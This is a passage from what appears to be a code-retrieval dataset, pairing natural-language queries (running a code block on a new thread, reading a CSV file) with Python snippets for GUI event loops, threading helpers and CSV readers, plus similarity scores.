RUNNING ?\n self.__loop.run_forever()", "def mainloop(self, *args, **kwargs):\n if in_idle():\n return\n self.top.mainloop(*args, **kwargs)", "def cb_gui_test_1( self, ):\r\n print( \"cb_gui_test_1\" )\r\n self.helper_thread.toggle_lock()", "def postloop(self):\n print 'Bye!'", "def on_run_clicked(self):\n self.start_threading()\n self.stepping = False\n self.step_event.set()", "def run( self ):\r\n \r\n # Execute the per-cycle work specifed by the user\r\n for f in self.updateFuncList:\r\n f() # Please make these lightweight and pertain to UI drawing!\r\n \r\n # Update window\r\n self.rootWin.update_idletasks() # idk , draw or something!\r\n \r\n # Wait remainder of period\r\n elapsed = time.time() * 1000 - self.last\r\n if elapsed < self.stepTime:\r\n sleepTime = int( self.stepTime - elapsed ) \r\n else:\r\n sleepTime = 0\r\n # 4.e. Mark beginning of next loop\r\n self.last = time.time() * 1000 \r\n self.rootWin.after( sleepTime , self.run )", "def mainloop(self, *args, **kwargs):\n if in_idle():\n return\n self._top.mainloop(*args, **kwargs)", "def run_message_loop(self):\n raise NotImplementedError", "def __macroRun(self):\n self.activeWindow().macroRun()", "def run_user_code(self, button):\n button.setEnabled(False)\n self.user_thread.start()", "def show(self):\n QtGui.QGuiApplication.processEvents()", "def run(self):\n self.root.mainloop()\n #self.root.destroy()", "def __loop(self):\n\n self.__update_table()\n self.__update_labels()\n if self.remote_stop:\n self.__stop(\"remote telegram admin\")\n else:\n self.__main_window.after(1000, self.__loop)", "def event_loop(self):\n if self.message_counter:\n if not self.msg:\n self.showdialog()\n else:\n self.msg.setText(\n \"COMET encounterd {} error(s)\".format(self.message_counter).ljust(\n 70\n )\n )", "def cb_gui_test_3( self, ):\r\n #self.task_list.stop_auto( )\r\n #self.gh_graphing.testGraph()\r\n print( \"cb_gui_test_3 commented out \" )", "def game_loop(self):\n self.interface.game_loop(self)", "def idle():", "def run(self): \r\n return", "def run(self):\n self.loop.spawn_callback(self.main)\n self.loop.start()\n if self.exc_info:\n six.reraise(*self.exc_info)", "def run(self, repl_callback, sleep_time=0.01):\n\n # The sleep_time is 100Hz by default, which seems like an ok balance\n # between CPU strain and smooth animations. Ideally we'd run a\n # real event loop though, that is fast when needed and just sleeps\n # when the gui is idle, saving battery life.\n\n if hasattr(time, \"perf_counter\"):\n perf_counter = time.perf_counter\n else:\n perf_counter = time.time\n perf_counter\n\n repl_time = 0.099\n next_repl = perf_counter() + repl_time\n\n # The toplevel while-loop is just to catch Keyboard interrupts\n # and then proceed. The inner while-loop is the actual event loop.\n while True:\n try:\n while True:\n time.sleep(sleep_time)\n self.process_events()\n if perf_counter() > next_repl:\n next_repl = perf_counter() + repl_time\n repl_callback()\n\n except KeyboardInterrupt:\n self._keyboard_interrupt()\n except TypeError:\n # For some reason, when wx is integrated, keyboard interrupts\n # result in a TypeError.\n # I tried to find the source, but did not find it. If anyone\n # has an idea, please e-mail me!\n if \"_wx\" in self.__class__.__name__.lower():\n self._keyboard_interrupt()", "def mainloop(self):\n self.app.mainloop()", "def __run(self):\n # init snake show\n self.__init_snake()\n self.__introduction.hide()\n # start ticktock for snake moving\n self.__ticker.start()\n # enable key press\n self.__enable_key = True", "def run(self):\r\n pass", "def start(self):\n self.root.mainloop()", "def run(self):\n\t\t\n\t\twhile self.update():\n\t\t\tpass", "def run_command(self):\r\n self.update_settings()\r\n self.run = True\r\n self.pause = False\r\n if self.run_call is not None:\r\n self.wm.after(1, self.run_call)", "def __run(self):\n sys.settrace(self.globaltrace) # set self.globaltrace before thread start\n self.__run_backup()\n self.run = self.__run_backup", "def run(self):\n self.centre.findChild(QPushButton, \"confirmBtn\").hide()\n self.centre.findChild(QPushButton, \"cancelBtn\").hide()\n self.centre.findChild(QLabel, \"loadingLabel\").show()\n self.centre.findChild(QLabel, \"title\").setText(\"Optimisation & Visualisation Processing\")\n self.finished.emit()", "def run(self):\n # self.root.mainloop()\n # self.root.destroy()", "def run(self):\n while self.__running:\n enum = self.__gui_app.pollButtonEvent()\n if enum != '':\n print enum\n if int(enum, 16) == 4:\n self.__qf.tick()\n else:\n self._publish(enum)\n\n print \"Exit: %s\\n\" % self", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def main():\n PanelDemo().mainloop()", "def exec_(self, *args, **kwargs):\n print_mainloop_warning(mainloopWarning_qt)\n\n # Store local namespaces (scopes) of any functions that\n # precede this call. It might have a widget or application\n # object that should not be deleted ...\n import inspect, __main__\n\n for caller in inspect.stack()[1:]:\n frame, name = caller[0], caller[3]\n if name.startswith(\"<\"): # most probably \"<module>\"\n break\n else:\n __main__.__dict__[name + \"_locals\"] = frame.f_locals\n\n # Tell interpreter to ignore any system exits\n sys._pyzoInterpreter.ignore_sys_exit = True\n\n # But re-enable it as soon as *this event* is processed\n def reEnableSysExit():\n sys._pyzoInterpreter.ignore_sys_exit = False\n\n self._reEnableSysExitTimer = timer = QtCore.QTimer()\n timer.singleShot(0, reEnableSysExit)", "def run(self, event):\n pass", "def _run(self):\n raise NotImplementedError", "def _run(self):\n raise NotImplementedError", "def mainloop(duration=1):\n\n _triggered.clear()\n NSApp = _NSApp()\n _stop_after(duration)\n msg(NSApp, n(\"run\"))\n if not _triggered.is_set():\n # app closed without firing callback,\n # probably due to last window being closed.\n # Run the loop manually in this case,\n # since there may be events still to process (ipython/ipython#9734)\n CoreFoundation.CFRunLoopRun()", "def _run(self):\n raise NotImplemented(\"Abstract method '_run' need to be defined\")", "async def next_frame() -> None:\n await run_in_main_thread(lambda: None)", "def mock_dear_py_gui():\n def _gui_thread(self):\n while not self.stop:\n _ = self.process_data.get()\n\n BaseRealTimeVisualizer._gui_thread = _gui_thread\n BaseRealTimeVisualizer.should_close = lambda self: False", "def run(self):\n while self.running:\n QtCore.QCoreApplication.processEvents()", "def wait(self):\n self.mainloop().wait()", "def startIfNeeded(self):\n assert self.notify.debugStateCall(self)\n # we need a try to stop the level editor from crashing\n try: \n self.curPhase = self.getPhaseToRun()\n if self.curPhase >= 0:\n self.request('DoAnim')\n except:\n pass", "def _run(self):\n raise NotImplementedError", "def run(self):\n # While loop to show display\n while True:\n for event in pg.event.get():\n # Quitting game\n if event.type == QUIT:\n pg.quit()\n sys.exit()\n # If game can continue\n if self.b.get_status() == \"-\":\n # Pressing mouse\n if event.type == MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n for r in self.b.get_board_array():\n for square in r:\n if square.get_visual().collidepoint(pos):\n square.click()\n self.b.update_board()", "def _run(self):\n\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)", "def _event_loop(self):\n while True:\n self.scheduler.run(blocking=True)\n time.sleep(1)", "def __call__(self):\n self.show()", "def block(self):\n while self.running:\n time.sleep( 1 )", "def _do_begin(self):\n self.backend.begin()", "def run(self):\n self.func()", "def refresh(self):\n\n if self.eventBox.window != None:\n self.eventBox.window.set_cursor(None)\n self.enable_controls(False)\n threading.Thread(target=self.thread_refresh).start()", "def game_tick_run(self):\n pass", "def run(self):\n self.ae.start()", "def run(self):\n\n # Create the dialog with elements (after translation) and keep reference\n # Only create GUI ONCE in callback, so that it will only load when the plugin is started\n self.estatInicial()\n \n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n while self._update_func():\n self.update_signal.emit(None)", "def _ipython_display_(self):\n with self._sc:\n self._box._ipython_display_()", "def run(self):\n self.schedule_next_event()\n response = super(CountdownDialog, self).run()\n self.destroy()\n\n if response != gtk.RESPONSE_ACCEPT:\n raise TestCancelled()", "def debug_run(self):\n self.emit(QtCore.SIGNAL(\"debug_run\"))", "def run(self):\n\n observer = Observer()\n observer.schedule(self.ehandler, \"./gl\", True)\n observer.start()\n observer.join()", "def fireMDPreferencesUpdated():\n myPrint(\"DB\", \"In \", inspect.currentframe().f_code.co_name, \"()\" )\n\n class FPSRunnable(Runnable):\n def __init__(self): pass\n\n def run(self):\n myPrint(\"DB\",\".. Inside FPSRunnable() - calling firePreferencesUpdated()...\")\n myPrint(\"B\",\"Triggering an update to the Summary/Home Page View\")\n MD_REF.getPreferences().firePreferencesUpdated()\n\n if not SwingUtilities.isEventDispatchThread():\n myPrint(\"DB\",\".. Not running within the EDT so calling via FPSRunnable()...\")\n SwingUtilities.invokeLater(FPSRunnable())\n else:\n myPrint(\"DB\",\".. Already running within the EDT so calling FPSRunnable() naked...\")\n FPSRunnable().run()\n return", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass" ]
[ "0.6536498", "0.64465624", "0.64465624", "0.6426398", "0.63144535", "0.61656505", "0.61306715", "0.60988885", "0.6066413", "0.6066413", "0.6001287", "0.59971917", "0.59842736", "0.5967664", "0.59582716", "0.5954346", "0.5944975", "0.59409404", "0.5900608", "0.58864576", "0.58551013", "0.5854173", "0.5829394", "0.58157957", "0.5808614", "0.57962173", "0.5795168", "0.57730794", "0.5766953", "0.57541233", "0.57510203", "0.5739478", "0.57257444", "0.5711411", "0.57085943", "0.5697658", "0.56858104", "0.5668062", "0.5667239", "0.5655469", "0.5652291", "0.56401837", "0.56334907", "0.5624765", "0.5622892", "0.5620886", "0.5617065", "0.56159073", "0.56012857", "0.5598907", "0.55982417", "0.559281", "0.55812955", "0.55789065", "0.5569227", "0.5568057", "0.55568796", "0.55427766", "0.5537586", "0.55366194", "0.55366194", "0.55366194", "0.5530434", "0.5526938", "0.5519359", "0.55180186", "0.55151325", "0.55151325", "0.5513162", "0.55112845", "0.54871947", "0.5470549", "0.5470274", "0.5466113", "0.5463601", "0.54557264", "0.54533553", "0.54474294", "0.5444968", "0.543987", "0.54367363", "0.54066956", "0.54043424", "0.538681", "0.53859246", "0.53820443", "0.5380925", "0.5368903", "0.5360745", "0.5355597", "0.5352274", "0.53499305", "0.5349462", "0.5331168", "0.5331168", "0.5331168", "0.5331168", "0.5331168", "0.5331168", "0.5331168" ]
0.6598361
0
Will run the codeblock on a new Thread
def genericThreadRunner(daemon, codeblock, *args): # myPrint("DB", "** In .genericThreadRunner(), codeblock: '%s', args: '%s'" %(codeblock, args)) myPrint("DB", "** In .genericThreadRunner(), codeblock: <codeblock>, args: <args>") class GenericThreadRunner(Runnable): def __init__(self, _codeblock, arguments): self.codeBlock = _codeblock self.params = arguments def run(self): myPrint("DB", "** In .genericThreadRunner():: GenericThreadRunner().run()... about to execute codeblock....") self.codeBlock(*self.params) myPrint("DB", "** In .genericThreadRunner():: GenericThreadRunner().run()... finished executing codeblock....") _gtr = GenericThreadRunner(codeblock, args) _t = Thread(_gtr, "NAB_GenericThreadRunner".lower()) _t.setDaemon(daemon) _t.start() myPrint("DB", "... finished calling the codeblock...")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Run(self):\n self.RunAsync().join()", "def run(self):\n self.ident = threading.current_thread().ident\n self.ready.set()\n self.exec_()", "def process_thread(self):", "def run(self):\n self.thread = threading.Thread(target=self._main)\n self.thread.start()\n self.running = True", "def runAsync(code):\n __PyMainThread__.runAsync(code)", "def _make_thread(self):\r\n pass", "def __init__(self):\n Thread.__init__(self)\n self.start()", "def __init__(self):\n Thread.__init__(self)\n self.start()", "def eval_in_thread(self):\n self._thread = Thread()\n self.interpreter.moveToThread(self._thread)\n self.interpreter.exec_signal.connect(\n self.interpreter.exec_, QueuedConnection)\n return self._thread", "def run(self):\n self.submit()\n self.start()", "def block(self):\n # I WILL RUN FOR EVER \n # BUT WHY ARE YOU RUNNING ?\n self.__loop.run_forever()", "def __run(self):\n sys.settrace(self.globaltrace) # set self.globaltrace before thread start\n self.__run_backup()\n self.run = self.__run_backup", "def _run(self):\n\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)", "def __init__(self):\n Thread.__init__(self)\n self.start() # start the thread", "def thread_method_block(handler, block_event):\n with ConnectionContext(handler):\n block_event.wait()", "def run(self):\n try:\n result = self._target()\n\n if self.abort:\n ThreadPool().post_event(ThreadResult(result, self._event_on_abort))\n else:\n ThreadPool().post_event(ThreadResult(result, self._event_on_complete))\n\n except Exception as err:\n ThreadPool().post_event(ThreadResult(err.args[0], self._event_on_error))", "def run_in_background(self, function):\n return function()", "def run_async(method):\n Thread(target=method, args=[]).start()", "def run(self):\n self.func()", "def run_in_thread(self, fn, *args, **kwargs):\r\n thread = threading.Thread(target=fn, args=args, kwargs=kwargs)\r\n thread.start()\r\n \r\n return thread", "def runSync(code):\n __PyMainThread__.runSync(code)\n sleep(0.1)", "def run(self):\n # Don't call this from the thread which it represents.\n assert eventlet.corolocal.get_ident() != self.id\n self.caller_sem = Semaphore(0)\n self.my_sem.release()\n self.caller_sem.acquire() # Wait for it to finish.", "def run(self):\n self.loop.spawn_callback(self.main)\n self.loop.start()\n if self.exc_info:\n six.reraise(*self.exc_info)", "def run(self) :\r\n \r\n try:\r\n if self._target:\r\n self._result = self._target(*self._args, **self._kwargs)\r\n except Exception, e :\r\n exc_info = sys.exc_info()\r\n logging.error(\"\".join(traceback.format_exception(*exc_info)))\r\n self._exception = e\r\n finally:\r\n # Avoid a refcycle if the thread is running a function with\r\n # an argument that has a member that points to the thread.\r\n del self._target, self._args, self._kwargs\r\n\r\n self._periodic_progress_dialog.stop()", "def run(self):\n self.run()", "def doctest_BackgroundWorkerThread_run():", "def thread_it(self, callback):\n\n def function():\n self.acquire_event_lock()\n callback()\n # threading.Thread(target=callback).start()\n self.release_event_lock()\n\n return function", "def _start_loop(self):\n self.p = tread.Thread(target=self._loop)\n self.p.start()", "def execute_task(self, task):\n t = threading.Thread(target=task)\n t.start()", "def _run(self):\n while(self._loop):\n pass", "def main_thread_enter(self):\n ...", "def run(self):\n self.cmdloop()", "def run(self):\n self.thread_send.start()\n self.thread_receive.start()", "def run(self):\n self.log.info(\"Starting thread: \" + self.name)\n self.object__ = self.run_process(self.object__, self.args)", "def call(self):\n current_thread = threading.current_thread() # get current thread·\n event = self.q.get() # get task from queue\n while event != self.StopEvent: # Determine whether task is a terminator\n\n func, arguments, callback = event # get funcname,params,callback name\n try:\n result = func(*arguments)\n func_excute_status = True # set func executed status success\n except Exception as e:\n func_excute_status = False # set func executed status failure\n result = None\n print('{} executed error:'.format(func.__name__), e)\n\n if func_excute_status: #\n if callback is not None: # determine whetherif callback is None\n try:\n callback(result)\n except Exception as e:\n print(callback.__name__, e)\n\n with self.worker_state(self.free_list, current_thread):\n if self.terminal:\n event = self.StopEvent\n else:\n event = self.q.get()\n\n else:\n self.created_list.remove(current_thread)", "def __enter__(self):\n self.run()\n return self", "def message_handler(self, msg):\n thread = threading.Thread(target=self.answer, args=(msg,))\n thread.start()\n return thread", "def _in_thread(func, *args, **kwargs):\r\n def _f():\r\n func(*args, **kwargs)\r\n t = threading.Thread(target=_f, name='/*/*')\r\n t.start()\r\n return t", "async def next_frame() -> None:\n await run_in_main_thread(lambda: None)", "def run_in_background(self):\n threading.Thread(target=self._run_loop).start()", "def _run(self):\n self._send_sequence() # Share the initial generator\n with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:\n while True:\n if self.stop_signal.is_set():\n return\n\n self.queue.put(\n executor.apply_async(next_sample, (self.uid,)), block=True)", "def run(self):\n try:\n if self._target:\n retval = self._target(*self._args, **self._kwargs)\n self._queue.put(retval)\n except Exception: # pylint: disable=broad-except\n self.err = sys.exc_info()\n logger.debug(\"Error in thread (%s): %s\", self._name,\n self.err[1].with_traceback(self.err[2]))\n finally:\n self._complete.set()\n # Avoid a ref-cycle if the thread is running a function with\n # an argument that has a member that points to the thread.\n del self._target, self._args, self._kwargs", "async def __aenter__(self):\n await self.start()", "def block(self):\n pass", "def run(self, threaded=False):\n if threaded:\n Thread(target=self._run).start()\n else:\n self._run()", "def doctest_BackgroundWorkerThread():", "def block(self):\n while self.running:\n time.sleep( 1 )", "def run (self):\n t = threading.Thread(target=self.runController)\n t.start()", "def _ensure_thread(self) -> None:\n\n if not self._thread:\n thread = self._thread_factory(self.run)\n self._thread = thread\n thread.start()", "def loop_run(self):\n super(EventLoop, self).loop_run()\n self.inq = self.cothread.EventQueue()", "def __enter__(self):\n self.start()\n return self", "def __enter__(self):\n self.start()\n return self", "async def __aenter__(self):\n assert self._task is None\n self._task = self._loop.create_task(self._run())\n return self", "def run(self):\n t = Thread(target=self._listen)\n t.start()", "async def run(self) -> None:", "async def run(self) -> None:", "def RunAsync(self):\n self.running_thread = threading.Thread(name=self.thread_name,\n target=self._RunLoop)\n self.running_thread.daemon = True\n self.running_thread.start()\n return self.running_thread", "def run_in_thread(fn):\r\n @staticmethod\r\n def run(*k):\r\n thread = threading.Thread(target=fn, args=(*k,), daemon = True)\r\n thread.start()\r\n return thread # <-- return the thread\r\n return run", "def start(self):\n self.thread.start()", "async def _main(self):\n while True:\n time.sleep(1)", "def run_threaded(self):\n \n t = threading.Thread(target=self.run, args=())\n t.daemon = True\n t.start()\n return t # Return the thread, but don't join it (the caller can join if they want to)", "def start_background_thread(self):\n self.runner = Runner(queue=queue, app_id=self.app_id)\n self.runner.start()\n # TODO: stop the thread at some point?", "def call_in_thread(self, callback):\n self.factory.manager.call_in_thread(callback)", "def run(self):\n self._keep_running()", "def run(self):\n try:\n while self._running:\n time.sleep(1)\n finally:\n self._exit()", "def run(self):\n while True:\n self.sm.run()\n time.sleep(0.05)", "def doctest_BackgroundWorkerThread_scheduleNextWork():", "def run(self, lock):\r\n return self.execute()", "def _transferExecution(self):\n self._btleSubThread = threading.Thread(target=self._executor)\n self._btleSubThread.start()\n\n\t# this method stops the car and quits completly.\n\t# safer than calling quit() from main script", "def run(self):\n self.started()", "def lock(self):\n self.mainloop().lock()", "def launchFunc():\n th = threading.Thread(target=progressScreen)\n th.start()", "def run(self):\n self.arbiter.start()", "async def run(self):\n try:\n await self._execute()\n finally:\n await self._stop()", "def run(self):\n self._started = True # Only set once to true!\n self.gui_block.set() # Unblocked by the GUI\n time.sleep(self.delay) # Should collect data before sending it\n while self._started:\n # If the application has been stopped, wait until it is unblocked\n if not self.gui_block.is_set():\n self.gui_block.wait()\n else:\n # The retriever thread is put into pause, and we wait until it\n # is actually paused. Then, we try to send the data. Finally, we\n # wake up the data retrieving thread back again.\n self.retriever.resume.clear()\n self.retriever.is_waiting.wait()\n self.send_data()\n self.retriever.resume.set()\n time.sleep(self.delay)", "def run(self): \r\n return", "def run_in_thread(self, callback: Callable, thread: int, **kwargs) -> None:\n self.run_in(callback, 0, pin=False, pin_thread=thread, **kwargs)", "def run_in_thread(fn):\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return t\n return run", "def run_in_thread(fn):\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return t\n return run", "def _make_async_call(self, plugin, info):\r\n self._threads[str(plugin.name)] = thread = IntrospectionThread(plugin, info)\r\n thread.request_handled.connect(self._handle_incoming)\r\n thread.start()", "def background(self):\n self.thread = threading.Thread(target=self.run)\n self.thread.setDaemon(True)\n self.thread.start()", "def start_thread(self):\n self.thread = Thread(target=self.put_lines_into_queue)\n self.thread.daemon = True\n self.thread.start()", "def run(self):\n self.monitor.start()", "def run(self):\n ioloop.IOLoop.current().start()", "def run(self):\n t = threading.Thread(target=self._thread_action,\n args=(self._sensor_queue,))\n t.daemon = True\n t.start()", "def executor(self):", "def call_in_thread(self, callback):\n reactor.callInThread(callback)", "def _run_aimbot_capture_task(self):\n\n if self._running_task is None and self._running_thread is None:\n\n self._running_task = self._system.aimbot_capture_task\n self._running_thread = threading.Thread(target=self._running_task.start)\n self._status_text.set('Aimbot - Capturing')\n self._running_thread.start()", "def pass_message_to_main_thread_fn():\n\n pass", "def do_work(self):", "def run(self):\n\n \"\"\"Call this function before trying to play any video with\n play_segment() or play().\n \"\"\"\n print(\"Task 2 assigned to thread: {}\".format(threading.current_thread().name))\n print(\"ID of process running task 2: {}\".format(os.getpid()))\n\n # If we don't use the MainLoop, messages are never sent.\n def start():\n print(\"Task 3 assigned to thread: {}\".format(threading.current_thread().name))\n print(\"ID of process running task 3: {}\".format(os.getpid()))\n print('====================> Using MainLoop\\n')\n loop = GLib.MainLoop()\n loop.run()\n \n \n print('====================> Starting a new thread for the player\\n')\n t = threading.Thread(target=start, name='thread_player')\n t.start()\n #_thread.start_new_thread(start, ())", "def run(self):\n\n while not self.done:\n\n self.event_loop()\n\n self.update()", "async def _job(self):\n await asyncio.sleep(self._timeout)\n await self._callback()", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "def _future_work_():\n pass", "def run(self):\n receiver = threading.Thread(target=self.receive_data)\n # Setting daemon to True means that this Thread will be terminated when the main program ends.\n receiver.daemon = True\n receiver.start()", "def doctest_BackgroundWorkerThread_forSite():", "def run(self):\r\n pass", "def __init__(self):\n self.continue_event = threading.Event()", "def run(self):\n \n pass" ]
[ "0.6713125", "0.6663096", "0.6575492", "0.6550865", "0.654327", "0.64968747", "0.6474789", "0.6474789", "0.6473518", "0.64723456", "0.64446056", "0.6290869", "0.62402534", "0.62397003", "0.61925733", "0.6187641", "0.6182442", "0.6176061", "0.61667424", "0.6138981", "0.61323655", "0.6094246", "0.6045352", "0.60410076", "0.6030783", "0.60078484", "0.60065114", "0.5985524", "0.5974132", "0.597016", "0.5967517", "0.5961253", "0.5961147", "0.59581494", "0.5956864", "0.5954301", "0.5926663", "0.592235", "0.59183323", "0.5902369", "0.58920485", "0.5890977", "0.58759314", "0.5875449", "0.58522177", "0.58444846", "0.584036", "0.5836034", "0.5816361", "0.5815054", "0.5807689", "0.5807689", "0.5775825", "0.57718194", "0.5770095", "0.5770095", "0.5761414", "0.57468355", "0.5746141", "0.5740587", "0.57393867", "0.5736791", "0.5736031", "0.5703515", "0.57000333", "0.5695598", "0.5683292", "0.56818336", "0.5674343", "0.5673067", "0.5671095", "0.56644344", "0.56474316", "0.5644087", "0.5634967", "0.56282103", "0.5627267", "0.5626396", "0.5626396", "0.5625433", "0.5624435", "0.56219167", "0.56193626", "0.56124943", "0.5609742", "0.56044835", "0.5597083", "0.55805826", "0.55793554", "0.55671763", "0.55637836", "0.5557856", "0.5554848", "0.5536856", "0.55361426", "0.55238587", "0.5523463", "0.55224776", "0.5521921", "0.55211663" ]
0.6160486
19
read table data from csv file
def read_csv(filename, delimiter=','): data = [] try: with open(filename, 'r') as csvfile: reader = csv.DictReader(csvfile, delimiter=delimiter) try: keys = reader.fieldnames for row in reader: data.append(row) except csv.Error as e: sys.exit('file %s, line %d: %s' % (filename, reader.line_num, e)) except IOError as e: sys.exit('%s does not exist' % e) return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_csv():", "def loadCSV(input_file):", "def get_data(self, csv_file):\n pass", "def read_csv_file(self):\n pass", "def read_csv_as_table(csv_input_file_name, skip_first_line=False):\n output = []\n with open(csv_input_file_name, 'r') as fin:\n csv_content = csv.reader(fin, delimiter=',')\n if skip_first_line:\n next(csv_content, None)\n for row in csv_content:\n output.append(row)\n return output", "def read_csv(self, csv_input):\n # https://stackoverflow.com/a/45063514\n dtypes = {\n 'lat': 'U',\n 'long': 'U'\n }\n csv_data = pd.read_csv(csv_input, encoding='UTF-8', sep=',', na_values=[''], dtype=dtypes)\n\n self.table = csv_data.fillna('').applymap(lambda x: x.strip() if type(x) == str else x)\n self.log.info('Data read from CSV %s' % csv_input)\n #print('Data read from CSV %s' % csv_input)", "def parse(csvfilename):\n table = []\n with open(csvfilename, \"r\") as csvfile:\n for line in csvfile:\n line = line.rstrip()\n columns = line.split(',')\n table.append(columns)\n return table", "def _read_csv(self):\n self.function_name = '_read_csv'\n with open(os.path.join(self.task.downloads, self.csv_name)) as csv_file:\n reader = csv.reader(csv_file, dialect='excel')\n for row in reader:\n self.input_data.append(row)", "def read_csv_file(file_name):\n table = []\n with open(file_name) as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', skipinitialspace=True)\n for row in csvreader:\n table.append(row)\n return table", "def load_data_csv():\r\n \r\n # Load lookup table\r\n path = 'data/id_lookup.csv'\r\n lookup_table = pd.read_csv(path, index_col=0)\r\n\r\n # Load song data\r\n path2 = 'data/data_lyrics_features.csv'\r\n data = pd.read_csv(path2, index_col=0)\r\n\r\n return data, lookup_table", "def read_specific_problem(filename):\r\n table = []\r\n with open(filename, newline='') as csvfile:\r\n reader = csv.reader(csvfile, skipinitialspace=True, delimiter=',')\r\n for row in reader:\r\n table.append(row)\r\n return table", "def read_table_from_csv(\n self,\n path: str,\n header: Optional[bool] = None,\n columns: Optional[List[str]] = None,\n dialect: Optional[Union[str, Dialect]] = None,\n delimiters: Optional[str] = None,\n column_unknown: str = \"Unknown\",\n encoding: Optional[str] = None,\n ) -> Table:\n sniffer = csv.Sniffer()\n with open(path, newline=\"\", encoding=encoding) as fd:\n sample = fd.readline()\n\n if dialect is None:\n dialect_name = sniffer.sniff(sample, delimiters)\n elif isinstance(dialect, Dialect):\n dialect_name = dialect.value\n else:\n dialect_name = dialect\n\n if header is None:\n header = sniffer.has_header(sample)\n\n with open(path, newline=\"\", encoding=encoding) as fd:\n if header:\n reader = csv.DictReader(\n fd, dialect=dialect_name, restkey=str(column_unknown)\n )\n else:\n reader = csv.reader(fd, dialect=dialect_name)\n rows = list(reader)\n\n table = Table(rows, columns)\n notebook_table(self.table_head(table, 10))\n\n if header and column_unknown in table.columns:\n self.logger.warning(\n \"CSV file (%s) had fields not defined in header, \"\n \"which can be the result of a wrong dialect\",\n path,\n )\n\n return table", "def parse_table_file(file):\n\n rows = [row for row in csv.reader(file.decode().splitlines(), delimiter=\",\",\n doublequote=True, escapechar=None, quotechar='\"',\n quoting=csv.QUOTE_MINIMAL, skipinitialspace=True)]\n\n if len(rows) < 2:\n raise Exception(\"File must contain at least two rows.\")\n\n # get header\n attributes = rows[0]\n\n # go through the csv by row\n data = []\n for row in rows[1:]:\n data.append(row)\n\n if len(attributes) < 1:\n raise Exception(\"File must contain at least one column.\")\n\n return attributes, data", "def get_table_from_file():\n with open(\"story.csv\", \"r\") as file:\n lines = file.readlines()\n table = [element.replace(\"\\n\", \"\").split(\";\") for element in lines]\n return table", "def data_from_csv(self, filepath):\n self.dataframe = pd.load_csv(filepath, separator='')", "def place_types_read_csv(self, csv_input):\n csv_data = pd.read_csv(csv_input, encoding='UTF-8', sep=',', na_values=[''])\n self.table = csv_data.fillna('').applymap(lambda x: x.strip() if type(x) == str else x)\n self.log.info('Data read from CSV %s' % csv_input)", "def handle_csv(self):\n try:\n reader = csv.reader(open(self.options.datafile, 'r'))\n except IOError:\n errormsg(_('Cannot read \"{}\"'.format(self.options.datafile)))\n raise Exception(_('Cannot read \"{}\"'.format(self.options.datafile)))\n if self.options.var_type == 'name':\n try:\n self.header = reader.next()\n except StopIteration:\n errormsg(_('Data file \"{}\" contains no data'.format(\n self.options.datafile)))\n raise Exception(_('Data file \"{}\" contains no data'.format(\n self.options.datafile)))\n self.data = []\n for row in reader:\n self.data.append(row)", "def tabular_parser(path: str, header: bool = True) -> TabularData:\n with open(path, \"r\") as read_obj:\n csv_reader = reader(read_obj)\n list_of_rows = list(csv_reader)\n rows = np.array(list_of_rows)\n\n if header:\n return TabularData(column_names=rows[0, :], data=rows[1:, :])\n else:\n return TabularData(column_names=None, data=rows[1:, :])", "def read_from_csv(self, csv_file):\n data = []\n with codecs.open(csv_file, 'r', encoding='utf-8') as csvfile:\n header = None\n for i, line in enumerate(csvfile):\n line_split = [x.strip() for x in line.split(\"|\")]\n line_data = [x for x in line_split if len(x) > 0]\n if i == 0:\n header = line_data\n else:\n entry = {}\n for i,datum in enumerate(line_data):\n entry[header[i]] = datum\n data.append(entry)\n print \"Loaded %d entries from %s\" % (len(data), csv_file)\n return data", "def load(file_name):\n with open(file_name, newline='') as f:\n reader = csv.reader(f)\n data = list(reader)\n\n schema = [x.strip() for x in data[0]]\n table = [[int(el) for el in row] for row in data[1:]]\n\n return schema, table", "def read_table(cls, filepath_or_buffer, *args, **vargs):\n if filepath_or_buffer.endswith('.csv') and 'sep' not in vargs:\n vargs['sep'] = ','\n df = pandas.read_table(filepath_or_buffer, *args, **vargs)\n labels = df.columns\n return Table([df[label].values for label in labels], labels)", "def read_csv_file(file_name):\n \n with open(file_name, newline='') as csv_file: # don't need to explicitly close the file now\n csv_table = []\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n csv_table.append(row)\n return csv_table", "def _read_tab(pth):\n if not os.path.exists(pth):\n raise SampleTableFileException(\n \"File does not exist: {}\".format(pth))\n read_csv_kwargs = {\"engine\": \"python\", \"dtype\": str,\n \"index_col\": False, \"keep_default_na\": False,\n \"na_values\": [\"\"]}\n return pd.read_csv(pth, sep=infer_delimiter(pth), **read_csv_kwargs)", "def create_table_from_file():\n\n full_path = os.getcwd()\n file_name = full_path + \"/inventory/inventory.csv\"\n\n if os.path.exists(file_name):\n table = 